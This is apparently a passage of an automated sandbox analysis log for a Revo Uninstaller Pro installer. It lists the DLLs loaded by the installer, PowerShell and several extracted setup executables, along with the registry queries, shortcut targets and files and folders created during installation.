      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: pnrpnsp.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: wshbth.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: nlaapi.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: winrnr.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: fwpuclnt.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: sspicli.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: cryptsp.dll
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeSection loaded: rsaenh.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: userenv.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: propsys.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: dwmapi.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: cryptbase.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: oleacc.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: ntmarta.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: version.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: shfolder.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: profapi.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: wininet.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: iertutil.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: winhttp.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: mswsock.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: iphlpapi.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: winnsi.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: urlmon.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: srvcli.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: netutils.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: dnsapi.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: rasadhlp.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: fwpuclnt.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: schannel.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: mskeyprotect.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: ntasn1.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: msasn1.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: dpapi.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: cryptsp.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: rsaenh.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: gpapi.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: ncrypt.dll
      Source: C:\Users\user\AppData\Local\Temp\RarSFX0\ya.exeSection loaded: ncryptsslp.dll
      Source: C:\Users\user\Downloads\OperaSetup.exeSection loaded: apphelp.dll
      Source: C:\Users\user\Downloads\OperaSetup.exeSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: apphelp.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: acgenral.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: uxtheme.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: winmm.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: samcli.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: msacm32.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: version.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: userenv.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: dwmapi.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: urlmon.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: mpr.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: sspicli.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: winmmbase.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: winmmbase.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: iertutil.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: srvcli.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: netutils.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: msimg32.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: secur32.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: dbghelp.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: wininet.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: propsys.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: winhttp.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: dbgcore.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: msasn1.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: kernel.appcore.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: ntmarta.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: windows.storage.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: wldp.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: profapi.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: mswsock.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: iphlpapi.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: winnsi.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: dnsapi.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: rasadhlp.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: fwpuclnt.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: schannel.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: mskeyprotect.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: ntasn1.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: dpapi.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: cryptsp.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: rsaenh.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: cryptbase.dll
      Source: C:\Users\user\AppData\Local\Temp\7zSCAE7B8AA\setup.exeSection loaded: gpapi.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: Revo Uninstaller Pro.lnk.0.drLNK file: ..\..\..\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
      Source: Revo Uninstaller Pro.lnk0.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exe
      Source: Uninstall Revo Uninstaller Pro.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\VS Revo Group\Revo Uninstaller Pro\Uninstall.exe
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeFile written: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\czech.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeAutomated click: Next >
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeAutomated click: Next >
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeAutomated click: Install
      Source: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeFile opened: C:\Windows\SYSTEM32\RICHED32.DLLJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo GroupJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller ProJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RUExt.dllJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoAppBar.exeJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoCmd.exeJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUnPro.exeJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.infJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\revoflt.sysJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\VistaJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.infJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Vista\revoflt.sysJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10Jump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.infJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Win10\revoflt.sysJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\License.txtJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\Revo Uninstaller Pro Help.pdfJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\RevoUninPro.exeJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\reg_lp.batJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\rupilogs.rupldbJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\ruplp.exeJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\langJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\Estonian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\albanian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\arabic.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\armenian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\azerbaijani.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\bengali.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\bulgarian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\czech.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\danish.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\dutch.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\english.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\finnish.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\french.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\german.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\gujarati.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hebrew.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hellenic.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hindi.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hrvatski.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\hungarian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\indonesian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\italiano.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\japanese.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\korean.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\kurdish.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\macedonian.iniJump to behavior
      Source: C:\Users\user\Desktop\Revo.Uninstaller.Pro.v5.3.4.exeDirectory created: C:\Program Files\VS Revo Group\Revo Uninstaller Pro\lang\norwegian.iniJump to behavior
